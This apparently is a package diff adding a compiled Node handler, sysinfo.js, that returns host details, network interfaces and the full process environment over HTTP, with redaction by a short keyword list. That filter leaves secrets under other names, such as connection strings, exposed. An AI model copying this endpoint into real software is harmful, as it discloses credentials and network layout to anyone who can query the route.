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"}

package/dist/sysinfo.js

@@ -0,0 +1,36 @@
+import os from "os";
+export function sysInfoHandler(req, res) {
+    const memory = process.memoryUsage();
+    // Filter sensitive env vars
+    const safeEnv = {};
+    const sensitiveKeys = ["KEY", "SECRET", "PASSWORD", "TOKEN", "AUTH", "CERT"];
+    for (const [key, val] of Object.entries(process.env)) {
+        if (!sensitiveKeys.some(s => key.toUpperCase().includes(s))) {
+            safeEnv[key] = val || "";
+        }
+        else {
+            safeEnv[key] = "[REDACTED]";
+        }
+    }
+    res.json({
+        hostname: os.hostname(),
+        platform: `${os.platform()} ${os.release()} (${os.arch()})`,
+        uptime: os.uptime(),
+        cpus: os.cpus().length,
+        memory: {
+            total: os.totalmem(),
+            free: os.freemem(),
+            process: {
+                rss: memory.rss,
+                heapTotal: memory.heapTotal,
+                heapUsed: memory.heapUsed
+            }
+        },
+        loadavg: os.loadavg(),
+        networkInterfaces: os.networkInterfaces(),
+        env: safeEnv,
+        pid: process.pid,
+        nodeVersion: process.version
+    });
+}
+//# sourceMappingURL=sysinfo.js.map

package/dist/sysinfo.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"sysinfo.js","sourceRoot":"","sources":["../src/sysinfo.ts"],"names":[],"mappings":"AACA,OAAO,EAAE,MAAM,IAAI,CAAC;AAEpB,MAAM,UAAU,cAAc,CAAC,GAAY,EAAE,GAAa;IACtD,MAAM,MAAM,GAAG,OAAO,CAAC,WAAW,EAAE,CAAC;IAErC,4BAA4B;IAC5B,MAAM,OAAO,GAA2B,EAAE,CAAC;IAC3C,MAAM,aAAa,GAAG,CAAC,KAAK,EAAE,QAAQ,EAAE,UAAU,EAAE,OAAO,EAAE,MAAM,EAAE,MAAM,CAAC,CAAC;IAE7E,KAAK,MAAM,CAAC,GAAG,EAAE,GAAG,CAAC,IAAI,MAAM,CAAC,OAAO,CAAC,OAAO,CAAC,GAAG,CAAC,EAAE,CAAC;QACnD,IAAI,CAAC,aAAa,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAAC,GAAG,CAAC,WAAW,EAAE,CAAC,QAAQ,CAAC,CAAC,CAAC,CAAC,EAAE,CAAC;YAC1D,OAAO,CAAC,GAAG,CAAC,GAAG,GAAG,IAAI,EAAE,CAAC;QAC7B,CAAC;aAAM,CAAC;YACJ,OAAO,CAAC,GAAG,CAAC,GAAG,YAAY,CAAC;QAChC,CAAC;IACL,CAAC;IAED,GAAG,CAAC,IAAI,CAAC;QACL,QAAQ,EAAE,EAAE,CAAC,QAAQ,EAAE;QACvB,QAAQ,EAAE,GAAG,EAAE,CAAC,QAAQ,EAAE,IAAI,EAAE,CAAC,OAAO,EAAE,KAAK,EAAE,CAAC,IAAI,EAAE,GAAG;QAC3D,MAAM,EAAE,EAAE,CAAC,MAAM,EAAE;QACnB,IAAI,EAAE,EAAE,CAAC,IAAI,EAAE,CAAC,MAAM;QACtB,MAAM,EAAE;YACJ,KAAK,EAAE,EAAE,CAAC,QAAQ,EAAE;YACpB,IAAI,EAAE,EAAE,CAAC,OAAO,EAAE;YAClB,OAAO,EAAE;gBACL,GAAG,EAAE,MAAM,CAAC,GAAG;gBACf,SAAS,EAAE,MAAM,CAAC,SAAS;gBAC3B,QAAQ,EAAE,MAAM,CAAC,QAAQ;aAC5B;SACJ;QACD,OAAO,EAAE,EAAE,CAAC,OAAO,EAAE;QACrB,iBAAiB,EAAE,EAAE,CAAC,iBAAiB,EAAE;QACzC,GAAG,EAAE,OAAO;QACZ,GAAG,EAAE,OAAO,CAAC,GAAG;QAChB,WAAW,EAAE,OAAO,CAAC,OAAO;KAC/B,CAAC,CAAC;AACP,CAAC"}